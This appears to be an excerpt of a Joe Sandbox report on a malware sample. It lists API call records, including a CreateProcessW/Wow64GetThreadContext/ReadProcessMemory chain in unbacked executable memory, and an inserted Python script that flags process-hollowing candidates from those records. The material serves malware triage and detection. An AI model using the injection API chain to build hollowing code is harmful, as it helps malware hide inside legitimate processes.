                                                                          • CreateProcessW.KERNELBASE(?,00000000), ref: 041982BB
                                                                          • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 04198351
                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 04198373
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1796927898.0000000004196000.00000040.00000020.00020000.00000000.sdmp, Offset: 04196000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4196000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                          • String ID:
                                                                          • API String ID: 2438371351-0
                                                                          • Opcode ID: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
                                                                          • Instruction ID: 41593a7b7fa6221b7454b14fbe50521e38db48ea0e688fb9ab140a5e6643f5c3
                                                                          • Opcode Fuzzy Hash: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
                                                                          • Instruction Fuzzy Hash: 9112DE20E24658C6EB24DF64D8507DEB272EF68300F1094E9D10DEB7A4E77A5F81CB5A
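The record above is the one a triager should stop at: CreateProcessW, Wow64GetThreadContext and ReadProcessMemory called from one function that lives in a region the report marks "based on PE: false", with dump-name fields 00000040 (PAGE_EXECUTE_READWRITE) and 00020000 (MEM_PRIVATE), i.e. unbacked RWX memory rather than the fJD7ivEnzm.exe image at 0x400000. That is the front half of a process-hollowing chain. The following script is an added example, not Joe Sandbox or FormBook code: it parses function records in the layout used on this page and scores each one on three signals (injection API chain, non-image private memory, writable+executable pages). It assumes the dotted .sdmp name is laid out as proc.step.dumpid.base.protect.state.type.n and only uses the base, protect and type fields, which match the documented Win32 PAGE_*/MEM_* values seen in the report; the sample input is two records copied from this page.

```python
"""Parse Joe Sandbox per-function records and flag process-hollowing candidates.

Added example for this report, not Joe Sandbox code.  ASSUMPTION: the dotted
.sdmp name is <proc>.<step>.<dumpid>.<base>.<protect>.<state>.<type>.<n>; only
<base>, <protect> and <type> are read, and they are interpreted as the Win32
PAGE_* / MEM_* constants (0x20 + 0x1000000 for the image at 0x400000,
0x40 + 0x20000 for the injected region at 0x4196000).
"""
import re
from dataclasses import dataclass, field

# Documented Win32 memory protection / region type values.
PAGE_EXECUTE_READWRITE = 0x40
PAGE_EXECUTE_WRITECOPY = 0x80
WRITABLE_EXEC = PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY
MEM_PRIVATE = 0x20000
MEM_IMAGE = 0x1000000

# APIs that, seen together in one function, form the hollowing/injection chain.
INJECTION_APIS = {
    "CreateProcessW", "CreateProcessA", "CreateProcessInternalW",
    "GetThreadContext", "Wow64GetThreadContext",
    "SetThreadContext", "Wow64SetThreadContext",
    "ReadProcessMemory", "WriteProcessMemory", "NtWriteVirtualMemory",
    "NtUnmapViewOfSection", "VirtualAllocEx", "ResumeThread", "NtResumeThread",
}

# "• Name.MODULE(args), ref: ADDR" or "• Part of subcall function X: Name.MODULE ref: ADDR"
API_RE = re.compile(
    r"•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<name>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)"
)
SRC_RE = re.compile(
    r"Source File:\s*(?P<dump>[0-9A-F.]+)\.sdmp,\s*Offset:\s*(?P<off>[0-9A-F]+),"
    r"\s*based on PE:\s*(?P<pe>true|false)"
)
STR_RE = re.compile(r"•\s*(?P<s>.+?),\s*xrefs:\s*(?P<ref>[0-9A-F]+)")


@dataclass
class FuncRecord:
    apis: list = field(default_factory=list)   # (name, module, args, ref, direct_call)
    strings: list = field(default_factory=list)
    base: int = 0
    protect: int = 0
    region_type: int = 0
    pe_backed: bool = True

    @property
    def direct_api_names(self):
        """APIs called by the function itself, excluding 'Part of subcall' lines."""
        return {name for name, _, _, _, direct in self.apis if direct}


def parse_records(text):
    """Split report text on 'APIs' headers and parse each function block."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = FuncRecord()
            records.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.search(line)
        if m:
            cur.apis.append((m.group("name"), m.group("mod"), m.group("args") or "",
                             m.group("ref"), m.group("sub") is None))
            continue
        m = SRC_RE.search(line)
        if m:
            f = m.group("dump").split(".")          # ASSUMED field layout, see docstring
            cur.base, cur.protect, cur.region_type = int(f[3], 16), int(f[4], 16), int(f[6], 16)
            cur.pe_backed = m.group("pe") == "true"
            continue
        m = STR_RE.search(line)
        if m:
            cur.strings.append(m.group("s"))
    return records


def assess(rec):
    """Score one function: returns (hits, reasons) for the hollowing heuristic."""
    reasons = []
    chain = rec.direct_api_names & INJECTION_APIS
    if len(chain) >= 2:
        reasons.append("injection API chain: " + ", ".join(sorted(chain)))
    if not rec.pe_backed and rec.region_type == MEM_PRIVATE:
        reasons.append("code in private non-image memory at 0x%08X" % rec.base)
    if rec.protect & WRITABLE_EXEC:
        reasons.append("writable+executable page (protect=0x%X)" % rec.protect)
    return len(reasons), reasons


def triage(text):
    """Parse and assess every record; returns [(base, score, reasons), ...]."""
    return [(r.base, *assess(r)) for r in parse_records(text)]


# Sample input: two function records copied from the report above.
SAMPLE = """
APIs
• CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 0040F13A
• CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 00426326
Memory Dump Source
• Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 041982BB
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 04198351
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 04198373
Memory Dump Source
• Source File: 00000000.00000002.1796927898.0000000004196000.00000040.00000020.00020000.00000000.sdmp, Offset: 04196000, based on PE: false
"""

if __name__ == "__main__":
    for base, score, reasons in triage(SAMPLE):
        print("0x%08X score=%d" % (base, score), *reasons, sep="\n  ")
```

Run as-is it scores the CreateFileW function in the image at 0 and the CreateProcessW/Wow64GetThreadContext/ReadProcessMemory function at 3. Each signal is weak on its own (a debugger legitimately calls GetThreadContext, JIT engines use RWX pages), so the point of the score is to rank the hundreds of records in a report, not to convict a single one; the other half of the chain (WriteProcessMemory / SetThreadContext / ResumeThread) normally shows up in a neighbouring function in the same unbacked region.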
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove
                                                                          • String ID:
                                                                          • API String ID: 4104443479-0
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove
                                                                          • String ID:
                                                                          • API String ID: 4104443479-0
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: __lock_file
                                                                          • String ID:
                                                                          • API String ID: 3031932315-0
                                                                          APIs
                                                                          • WriteFile.KERNELBASE(?,?,?,?,00000000,?,?,?,004263D0,?,00487ACC,00000003,0040DE90,?,?,00000001), ref: 00443E54
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: FileWrite
                                                                          • String ID:
                                                                          • API String ID: 3934441357-0
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: __wfsopen
                                                                          • String ID:
                                                                          • API String ID: 197181222-0
                                                                          APIs
                                                                          • CloseHandle.KERNELBASE(?,?,00426FBF), ref: 0040DA3D
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: CloseHandle
                                                                          • String ID:
                                                                          • API String ID: 2962429428-0
                                                                          APIs
                                                                          • Sleep.KERNELBASE(000001F4), ref: 04198B11
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1796927898.0000000004196000.00000040.00000020.00020000.00000000.sdmp, Offset: 04196000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4196000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Sleep
                                                                          • String ID:
                                                                          • API String ID: 3472027048-0
                                                                          APIs
                                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
                                                                          • DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
                                                                          • GetKeyState.USER32(00000011), ref: 0047C92D
                                                                          • GetKeyState.USER32(00000009), ref: 0047C936
                                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
                                                                          • GetKeyState.USER32(00000010), ref: 0047C953
                                                                          • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C967
                                                                          • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
                                                                          • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
                                                                          • _wcsncpy.LIBCMT ref: 0047CA29
                                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
                                                                          • SendMessageW.USER32 ref: 0047CA7F
                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
                                                                          • SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
                                                                          • ImageList_SetDragCursorImage.COMCTL32(00A8EFD8,00000000,00000000,00000000), ref: 0047CB9B
                                                                          • ImageList_BeginDrag.COMCTL32(00A8EFD8,00000000,000000F8,000000F0), ref: 0047CBAC
                                                                          • SetCapture.USER32(?), ref: 0047CBB6
                                                                          • ClientToScreen.USER32(?,?), ref: 0047CC17
                                                                          • ImageList_DragEnter.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
                                                                          • ReleaseCapture.USER32 ref: 0047CC3A
                                                                          • GetCursorPos.USER32(?), ref: 0047CC72
                                                                          • ScreenToClient.USER32(?,?), ref: 0047CC80
                                                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
                                                                          • SendMessageW.USER32 ref: 0047CD12
                                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
                                                                          • SendMessageW.USER32 ref: 0047CD80
                                                                          • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
                                                                          • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
                                                                          • GetCursorPos.USER32(?), ref: 0047CDC8
                                                                          • ScreenToClient.USER32(?,?), ref: 0047CDD6
                                                                          • GetParent.USER32(00000000), ref: 0047CDF7
                                                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
                                                                          • SendMessageW.USER32 ref: 0047CE93
                                                                          • ClientToScreen.USER32(?,?), ref: 0047CEEE
                                                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,009C1AC0,00000000,?,?,?,?), ref: 0047CF1C
                                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
                                                                          • SendMessageW.USER32 ref: 0047CF6B
                                                                          • ClientToScreen.USER32(?,?), ref: 0047CFB5
                                                                          • TrackPopupMenuEx.USER32(?,00000080,?,?,009C1AC0,00000000,?,?,?,?), ref: 0047CFE6
                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 0047D086
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$ClientScreen$Image$CursorDragList_State$CaptureLongMenuPopupTrackWindow$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                          • String ID: @GUI_DRAGID$F
                                                                          • API String ID: 3100379633-4164748364
                                                                          • Opcode ID: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                                          • Instruction ID: 980357f173c9be8e312ccaa606797ee7157b6525bda81ee0817efdfc4c954517
                                                                          • Opcode Fuzzy Hash: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                                          • Instruction Fuzzy Hash: F842AD706043419FD714DF28C884FABB7A5FF89700F14865EFA489B291C7B8E846CB5A
                                                                          APIs
                                                                          • GetForegroundWindow.USER32 ref: 00434420
                                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
                                                                          • IsIconic.USER32(?), ref: 0043444F
                                                                          • ShowWindow.USER32(?,00000009), ref: 0043445C
                                                                          • SetForegroundWindow.USER32(?), ref: 0043446A
                                                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
                                                                          • GetCurrentThreadId.KERNEL32 ref: 00434485
                                                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
                                                                          • AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
                                                                          • SetForegroundWindow.USER32(00000000), ref: 004344B7
                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
                                                                          • keybd_event.USER32(00000012,00000000), ref: 004344CF
                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
                                                                          • keybd_event.USER32(00000012,00000000), ref: 004344E6
                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
                                                                          • keybd_event.USER32(00000012,00000000), ref: 004344FD
                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
                                                                          • keybd_event.USER32(00000012,00000000), ref: 00434514
                                                                          • SetForegroundWindow.USER32(00000000), ref: 0043451E
                                                                          • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                                                                          • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                          • String ID: Shell_TrayWnd
                                                                          • API String ID: 2889586943-2988720461
                                                                          • Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                                          • Instruction ID: 0b42b206f44700a00bd4aa1610e9651ae8f7722fee000eb3c659fd44b6abead8
                                                                          • Opcode Fuzzy Hash: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                                          • Instruction Fuzzy Hash: AD416272640218BFE7205BA4DE4AFBE7B6CDB58B11F10442EFA01EA1D0D6F458419BA9
                                                                          APIs
                                                                          • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
                                                                          • CloseHandle.KERNEL32(?), ref: 004463A0
                                                                          • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
                                                                          • GetProcessWindowStation.USER32 ref: 004463D1
                                                                          • SetProcessWindowStation.USER32(00000000), ref: 004463DB
                                                                          • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
                                                                          • _wcslen.LIBCMT ref: 00446498
                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                          • _wcsncpy.LIBCMT ref: 004464C0
                                                                          • LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
                                                                          • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
                                                                          • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
                                                                          • UnloadUserProfile.USERENV(?,?), ref: 00446555
                                                                          • CloseWindowStation.USER32(00000000), ref: 0044656C
                                                                          • CloseDesktop.USER32(?), ref: 0044657A
                                                                          • SetProcessWindowStation.USER32(?), ref: 00446588
                                                                          • CloseHandle.KERNEL32(?), ref: 00446592
                                                                          • DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
                                                                          • String ID: $@OH$default$winsta0
                                                                          • API String ID: 3324942560-3791954436
                                                                          • Opcode ID: 4d1d68c1aea3dabcf030405aafb24e1344eb51be90ba82aa3e7b9bd6ceeac822
                                                                          • Instruction ID: a255b9755a473e3b45922b0ee48cea4cb67e1360e8ecd59b8ab49ad27cdc7b44
                                                                          • Opcode Fuzzy Hash: 4d1d68c1aea3dabcf030405aafb24e1344eb51be90ba82aa3e7b9bd6ceeac822
                                                                          • Instruction Fuzzy Hash: A28180B0A00209ABEF10CFA5DD4AFAF77B8AF49704F05455EF914A7284D778D901CB69
                                                                          APIs
                                                                          • _wcslen.LIBCMT ref: 004096C1
                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                          • _memmove.LIBCMT ref: 0040970C
                                                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                            • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                          • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
                                                                          • _memmove.LIBCMT ref: 00409D96
                                                                          • _memmove.LIBCMT ref: 0040A6C4
                                                                          • _memmove.LIBCMT ref: 004297E5
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
                                                                          • String ID:
                                                                          • API String ID: 2383988440-0
                                                                          • Opcode ID: e127891bc0a98d019add158fe61e22172890978285290b421ac62a594046158c
                                                                          • Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
                                                                          • Opcode Fuzzy Hash: e127891bc0a98d019add158fe61e22172890978285290b421ac62a594046158c
                                                                          • Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B
                                                                          APIs
                                                                            • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                            • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 0043392E
                                                                            • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 00433950
                                                                            • Part of subcall function 00433908: __wcsicoll.LIBCMT ref: 00433974
                                                                            • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                          • _wcscat.LIBCMT ref: 0044BD94
                                                                          • _wcscat.LIBCMT ref: 0044BDBD
                                                                          • __wsplitpath.LIBCMT ref: 0044BDEA
                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 0044BE02
                                                                          • _wcscpy.LIBCMT ref: 0044BE71
                                                                          • _wcscat.LIBCMT ref: 0044BE83
                                                                          • _wcscat.LIBCMT ref: 0044BE95
                                                                          • lstrcmpiW.KERNEL32(?,?), ref: 0044BEC1
                                                                          • DeleteFileW.KERNEL32(?), ref: 0044BED3
                                                                          • MoveFileW.KERNEL32(?,?), ref: 0044BEF3
                                                                          • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0A
                                                                          • DeleteFileW.KERNEL32(?), ref: 0044BF15
                                                                          • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2C
                                                                          • FindClose.KERNEL32(00000000), ref: 0044BF33
                                                                          • MoveFileW.KERNEL32(?,?), ref: 0044BF4F
                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF64
                                                                          • FindClose.KERNEL32(00000000), ref: 0044BF7C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
                                                                          • String ID: \*.*
                                                                          • API String ID: 2188072990-1173974218
                                                                          • Opcode ID: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                                                                          • Instruction ID: 72a2fd59153234373391f972af8bc7e503bf673df65afccb4f4ecee040a4f935
                                                                          • Opcode Fuzzy Hash: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                                                                          • Instruction Fuzzy Hash: E25167B2408384AAD734DB50DC45EDF73E9AFC8304F544E1EF68982141EB75D249CBA6
                                                                          APIs
                                                                          • FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
                                                                          • FindClose.KERNEL32(00000000), ref: 00478924
                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
                                                                          • __swprintf.LIBCMT ref: 004789D3
                                                                          • __swprintf.LIBCMT ref: 00478A1D
                                                                          • __swprintf.LIBCMT ref: 00478A4B
                                                                          • __swprintf.LIBCMT ref: 00478A79
                                                                            • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 00413314
                                                                            • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 0041332C
                                                                          • __swprintf.LIBCMT ref: 00478AA7
                                                                          • __swprintf.LIBCMT ref: 00478AD5
                                                                          • __swprintf.LIBCMT ref: 00478B03
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
